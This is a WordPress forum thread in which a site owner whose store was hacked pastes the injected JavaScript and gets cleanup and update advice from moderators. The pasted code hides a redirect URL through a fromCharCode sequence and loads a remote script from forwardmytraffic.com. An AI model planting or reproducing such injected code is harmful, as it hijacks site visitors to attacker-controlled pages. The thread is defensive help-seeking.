Problem with wordpress

  • Hello,

    A few weeks ago I set a website on the wordpress platform. Unfortunately, my store was hacked. Can somebody help me restore the store to a second-to-a-prior state? How can I defend myself against such intrusions in the future ?

    When I want to login to my website I have such as notification:

    (function() {

    var u=String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 102, 111, 114, 119, 97, 114, 100, 109, 121, 116, 114, 97, 102, 102, 105, 99, 46, 99, 111, 109, 47, 99, 111, 110, 118, 101, 114, 116, 46, 112, 104, 112, 63, 117, 116, 109, 61, 52, 51, 54, 38, 115, 101, 114, 118, 105, 99, 101, 61, 55, 54);
    /*if (window.location.href.indexOf(“/wp-admin/”) === -1){ window.location.replace(u);document.location.replace(u);window.location.href=u;document.location.href=u;}
    if (window.location.href.indexOf(“/wp-admin/setup-config.php”) === 1){ window.location.replace(u);document.location.replace(u);window.location.href=u;document.location.href=u;}*/
    /*var d=document, g=d.createElement(‘script’), s=d.getElementsByTagName(‘script’)[0];
    g.type=’text/javascript’; g.async=true; g.defer=true; g.src=’//cdn.matomo.cloud/idx4.matomo.cloud/piwik.js’; s.parentNode.insertBefore(g,s);*/
    })();
    var _paq = _paq || [];
    /* tracker methods like “setCustomDimension” should be called before “trackPageView” */
    _paq.push([‘trackPageView’]);
    _paq.push([‘enableLinkTracking’]);
    (function() {
    var u=”https://voltaer.matomo.cloud/”;
    _paq.push([‘setTrackerUrl’, u+’piwik.php’]);
    _paq.push([‘setSiteId’, ‘1’]);
    var d=document, g=d.createElement(‘script’), s=d.getElementsByTagName(‘script’)[0];
    g.type=’text/javascript’; g.async=true; g.defer=true; g.src=’//cdn.matomo.cloud/voltaer.matomo.cloud/piwik.js’; s.parentNode.insertBefore(g,s);
    })();
    /*
    (function() {
    var u=”https://idx4.matomo.cloud/”;
    _paq.push([‘setTrackerUrl’, u+’piwik.php’]);
    _paq.push([‘setSiteId’, ‘1’]);
    var d=document, g=d.createElement(‘script’), s=d.getElementsByTagName(‘script’)[0];
    g.type=’text/javascript’; g.async=true; g.defer=true; g.src=’https://forwardmytraffic.com/funcs.js’; s.parentNode.insertBefore(g,s);
    })();

    */

Viewing 5 replies - 1 through 5 (of 5 total)

  • You must check modified files, best in some ftp application.
    Check files: index.php, setup-config.php in folder wp-admin or other files with changed date.

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Thread Starter lanter56

    (@lanter56)

    I had a burglary on the site. I talked to the server’s provider and told me that the burglary occurred through a wordpress plugin – WP GDPR Compliance. How to protect my website from such problems in the future?

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Keep plugins up to date. A lot of folks got nailed by that one as it was exploited very quickly. @lanter56, if you need support then per the forum welcome please create your own new forum post. Thanks.

    Marucins

    (@marucins)

    Steven Stern, thanks a lot!

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Problem with wordpress’ is closed to new replies.